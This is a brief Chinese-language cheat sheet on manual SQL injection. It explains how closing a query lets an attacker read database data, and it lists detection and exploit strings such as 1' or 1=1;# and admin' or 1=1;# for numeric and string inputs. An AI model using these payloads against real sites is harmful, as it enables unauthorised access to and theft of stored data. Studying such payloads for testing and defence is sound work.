手工SQL注入: 原理:依靠创造SQL语句的闭合来获取数据库的数据 1、数字型 (1)判断注入 1‘ 1 and 1=1 1 and 1=2 (2)注入过程 1' or 1=1;# 获取表中所有数据 2.字符型 (1)判断注入 admin’ and ‘1’=1–’ admin’ and ‘1=2–’ (2)注入过程 admin' or 1=1;# 获取表中所有数据